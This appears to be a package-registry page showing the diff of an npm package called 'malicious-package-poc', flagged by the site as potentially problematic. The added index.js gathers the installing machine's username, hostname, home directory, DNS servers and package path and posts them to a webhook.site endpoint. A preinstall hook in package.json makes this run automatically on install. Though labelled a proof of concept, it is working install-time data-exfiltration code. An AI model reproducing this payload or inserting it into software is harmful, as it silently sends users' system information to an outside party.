malicious-package-poc 1.0.4

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of malicious-package-poc might be problematic. Click here for more details.

Files changed (2) hide show
  1. package/index.js +49 -0
  2. package/package.json +12 -0
package/index.js ADDED
@@ -0,0 +1,49 @@
1
+ //author:- whitehacker003@protonmail.com
2
+ const os = require("os");
3
+ const dns = require("dns");
4
+ const querystring = require("querystring");
5
+ const https = require("https");
6
+ const packageJSON = require("./package.json");
7
+ const package = packageJSON.name;
8
+
9
+ const trackingData = JSON.stringify({
10
+ p: package,
11
+ c: __dirname,
12
+ hd: os.homedir(),
13
+ hn: os.hostname(),
14
+ un: os.userInfo().username,
15
+ dns: dns.getServers(),
16
+ r: packageJSON ? packageJSON.___resolved : undefined,
17
+ v: packageJSON.version,
18
+ pjson: packageJSON,
19
+ });
20
+
21
+ var postData = querystring.stringify({
22
+ msg: trackingData,
23
+ });
24
+
25
+ var options = {
26
+ // hostname: "vji904pe1ce6dx31yns71zaqjhp8dx.oastify.com",
27
+ hostname: "webhook.site", //replace burpcollaborator.net with Interactsh or pipedream
28
+ port: 443,
29
+ // path: "/",
30
+ path: "/f4886c6d-cbee-4eb5-a1e0-90715b36642d",
31
+ method: "POST",
32
+ headers: {
33
+ "Content-Type": "application/x-www-form-urlencoded",
34
+ "Content-Length": postData.length,
35
+ },
36
+ };
37
+
38
+ var req = https.request(options, (res) => {
39
+ res.on("data", (d) => {
40
+ process.stdout.write(d);
41
+ });
42
+ });
43
+
44
+ req.on("error", (e) => {
45
+ // console.error(e);
46
+ });
47
+
48
+ req.write(postData);
49
+ req.end();
package/package.json ADDED
@@ -0,0 +1,12 @@
1
+ {
2
+ "name": "malicious-package-poc",
3
+ "version": "1.0.4",
4
+ "description": "POC",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1",
8
+ "preinstall": "node index.js"
9
+ },
10
+ "author": "",
11
+ "license": "ISC"
12
+ }